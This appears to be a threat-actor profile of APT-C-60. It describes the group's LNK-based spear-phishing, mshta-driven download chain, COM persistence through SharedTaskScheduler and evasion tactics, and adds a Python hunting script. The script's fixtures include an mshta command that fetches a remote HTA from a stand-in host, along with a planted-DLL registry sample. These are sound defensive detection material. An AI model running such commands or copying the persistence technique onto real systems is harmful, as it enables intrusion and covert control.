APT-C-60 | |
Other Names | Pseudo Hunter |
Location | South Korea |
Date of Initial Activity | 2021 |
Suspected Attribution | APT |
Motivation | Cyberwarfare |
Software | Windows |
Overview
APT-C-60 is a sophisticated and highly active advanced persistent threat (APT) group. First publicly disclosed by security vendors in 2021, it is believed to have been operating since at least 2018, with a history of targeting key industries and geopolitical entities. APT-C-60 has been linked to a series of intrusions that combine multi-stage tooling with a clear focus on espionage and information theft. Its operations often target institutions involved in human resources, trade, and diplomacy, with notable activity in China and South Korea.
The group’s attacks are marked by precision and stealth and typically begin with spear-phishing. APT-C-60 uses socially engineered emails to persuade victims to download malicious payloads, which are hosted on public cloud platforms or on private command-and-control (C&C) servers. These payloads are multi-stage malware built to maintain persistent access, steal sensitive information, and support further exploitation of the network. The group’s ability to stay undetected for extended periods across several infection stages is one of its most concerning features.
Common targets
Information
Individuals
Public Administration
China
South Korea
Attack Vectors
Phishing
Software Vulnerabilities
How they operate
One of the primary techniques used by APT-C-60 is spear-phishing: highly targeted emails sent to specific individuals within an organization. These emails carry malicious attachments or links disguised as legitimate documents or correspondence. For example, during a 2022 campaign against South Korean officials, APT-C-60 impersonated a Korean graduate student and sent an email that appeared to contain a thesis defense presentation. The attachment was a compressed RAR archive containing a malicious LNK (shortcut) file. No software vulnerability is required at this step: double-clicking the shortcut simply runs the command line embedded in it, which launches the next stage. This demonstrates the group’s skill at building convincing lures that get the victim to execute the payload themselves.
Once the victim opens the shortcut, the infection chain starts. The LNK file acts as a downloader: it invokes mshta.exe to execute remote JavaScript. That JavaScript is obfuscated to evade detection and downloads further resources from the C&C server. The next-stage payload is then decrypted and written to disk, typically in a hidden directory under the user’s AppData folder, as a file named mssysmon.db, a persistent downloader Trojan that keeps the group’s access to the compromised machine. Persistence does not rely on a conventional scheduled task: the DLL is registered as a COM object under Explorer’s SharedTaskScheduler registry key, so explorer.exe loads it at every logon and the Trojan survives reboots.
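The two stages described above, the mshta.exe downloader launched from the shortcut and the COM registration under SharedTaskScheduler, each leave a simple artefact a hunter can check for. The following is an added example written for this page, not code from the original article or from any vendor report. It assumes that the "shared task scheduler" the text refers to is the Explorer registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskScheduler (the page does not spell out the key path), and all inputs, the Sysmon-style process-creation events and the Regedit export, are constructed for the example; the CLSID of the malicious entry is made up, while the Browseui preloader entry stands in for a legitimate default.

```python
"""Two hunting checks for the infection chain described above.

Added example, not code from the original page or from any vendor report.
All input is constructed inline: Sysmon-style process-creation events and a
Regedit 5.00 export of the SharedTaskScheduler key plus two CLSID entries.
"""
import re

# Assumption: the "shared task scheduler" the page refers to is this Explorer
# registry key; explorer.exe instantiates every CLSID listed under it at logon,
# so a DLL registered here runs again after every reboot without a scheduled task.
SHARED_TASK_KEY = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows"
                   r"\CurrentVersion\Explorer\SharedTaskScheduler")
# Directories a legitimate SharedTaskScheduler server is expected to load from.
TRUSTED_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# HKCU\Software\Classes shadows HKCR, so a per-user hijack is checked first.
CLSID_HIVES = ("hkey_current_user\\software\\classes\\clsid\\", "hkey_classes_root\\clsid\\")

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
SCRIPT_PROTO_RE = re.compile(r"\b(javascript|vbscript):", re.IGNORECASE)


def flag_mshta_remote(events):
    """Return mshta.exe launches whose command line fetches a remote script or
    embeds an inline javascript:/vbscript: payload (the LNK downloader stage)."""
    hits = []
    for ev in events:
        if not ev.get("Image", "").lower().endswith(r"\mshta.exe"):
            continue
        cmd = ev.get("CommandLine", "")
        reasons = []
        if URL_RE.search(cmd):
            reasons.append("remote script URL")
        if SCRIPT_PROTO_RE.search(cmd):
            reasons.append("inline script protocol")
        if reasons:
            hits.append({"pid": ev["ProcessId"], "parent": ev.get("ParentImage", ""),
                         "command": cmd, "reasons": reasons})
    return hits


def parse_reg(text):
    """Minimal parser for a Regedit 5.00 export: {key.lower(): {value_name: data}}.
    Only REG_SZ strings are decoded, which is all the SharedTaskScheduler check needs."""
    reg, key = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1].lower()
            reg[key] = {}
        elif key and "=" in line:
            name, _, data = line.partition("=")
            name = "@" if name == "@" else name.strip('"')
            if data.startswith('"') and data.endswith('"'):
                data = data[1:-1].replace("\\\\", "\\")   # .reg files double backslashes
            reg[key][name] = data
    return reg


def flag_shared_task_scheduler(reg_text):
    """Resolve each CLSID under SharedTaskScheduler to its InprocServer32 DLL and
    flag servers outside System32/SysWOW64 or carrying a non-.dll extension."""
    reg = parse_reg(reg_text)
    findings = []
    for clsid, label in reg.get(SHARED_TASK_KEY.lower(), {}).items():
        server = ""
        for hive in CLSID_HIVES:
            server = reg.get(hive + clsid.lower() + r"\inprocserver32", {}).get("@", "")
            if server:
                break
        low = server.lower()
        reasons = []
        if not server:
            reasons.append("no InprocServer32 found")
        else:
            if not low.startswith(TRUSTED_DIRS):
                reasons.append("server outside System32/SysWOW64")
            if not low.endswith(".dll"):
                reasons.append("non-.dll extension")
        if reasons:
            findings.append({"clsid": clsid, "label": label, "server": server, "reasons": reasons})
    return findings


SAMPLE_EVENTS = [  # constructed, loosely modelled on Sysmon event ID 1 fields
    {"ProcessId": 4120, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta.exe https://cdn.example.invalid/thesis/defense.hta"},
    {"ProcessId": 4188, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Program Files\Vendor\setup.exe",
     "CommandLine": r'mshta.exe "C:\Program Files\Vendor\setup.hta"'},
    {"ProcessId": 4200, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "cmd.exe /c dir"},
]

# Constructed export: one legitimate entry, one made-up CLSID pointing at a .db in AppData.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskScheduler]
"{438755C2-A8BA-11D1-B96B-00A0C90312E1}"="Browseui preloader"
"{6E2A9F44-1B3C-4C7D-8E5F-0A1B2C3D4E5F}"="Windows Update Helper"

[HKEY_CLASSES_ROOT\CLSID\{438755C2-A8BA-11D1-B96B-00A0C90312E1}\InprocServer32]
@="C:\\Windows\\System32\\browseui.dll"
"ThreadingModel"="Apartment"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{6E2A9F44-1B3C-4C7D-8E5F-0A1B2C3D4E5F}\InprocServer32]
@="C:\\Users\\victim\\AppData\\Roaming\\Microsoft\\mssysmon.db"
"ThreadingModel"="Apartment"
"""

if __name__ == "__main__":
    for hit in flag_mshta_remote(SAMPLE_EVENTS):
        print("mshta:", hit)
    for finding in flag_shared_task_scheduler(SAMPLE_REG):
        print("SharedTaskScheduler:", finding)
```

On a live host the same two functions can be fed from a SIEM export of process-creation events and from `reg export` of the SharedTaskScheduler key plus the CLSID hives; the path and extension heuristics are deliberately conservative, so a hit is worth a manual look at the DLL rather than an automatic verdict.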
The downloaded payload, mssysmon.db, is a DLL that provides the core functionality of the implant. Its primary role is to enable further exploitation: information gathering, file theft, and delivery of additional malware. On start-up it creates a uniquely named event object and exits if that object already exists, so only one instance runs at a time. It then contacts the C&C server at a fixed interval, typically every six hours, to receive instructions and download additional files. Those files are written with image extensions such as .dib or .bmp, so that a casual look at the directory, or a filter keyed on executable extensions, treats them as harmless bitmaps.
APT-C-60 also takes care to hide its presence on the infected machine. The malware’s configuration, including C&C URLs, heartbeat intervals and fallback C&C addresses, is stored encrypted, so the addresses do not show up as static strings, and the fallback entries let the implant keep operating if a primary channel is blocked or taken down. Using legitimate services such as Bitbucket and StatCounter in the delivery chain further complicates detection, because traffic to these domains is routinely trusted and rarely blocked.
In addition, APT-C-60 deploys a remote-control Trojan, TaskControler.dll, that gives the group full control of the infected system: it loads additional plugins, executes commands, and collects data from the compromised machine. The ability to carry out file theft and other espionage tasks without being detected highlights the depth of the group’s technical capabilities.
The group’s operational security is also noteworthy. By mixing legitimate and private infrastructure for payload hosting and C&C communication, it stays under the radar of traditional defences, and by rapidly changing or deleting hosted files after use it shrinks the window in which analysts can retrieve samples.
APT-C-60’s technical operations reflect a high level of sophistication and adaptability. Through well-crafted spear-phishing, multi-stage malware deployment, and careful use of cloud infrastructure, the group has targeted high-profile individuals and organizations with significant success. Its evasion techniques and persistent access make it a formidable threat. To defend against APT-C-60, organizations should combine phishing defences that catch archived shortcut files, endpoint visibility into script hosts such as mshta.exe and into COM registrations, and monitoring of network traffic for periodic beacons to cloud and analytics services. Understanding how the group operates is essential to building effective countermeasures against this persistent threat actor.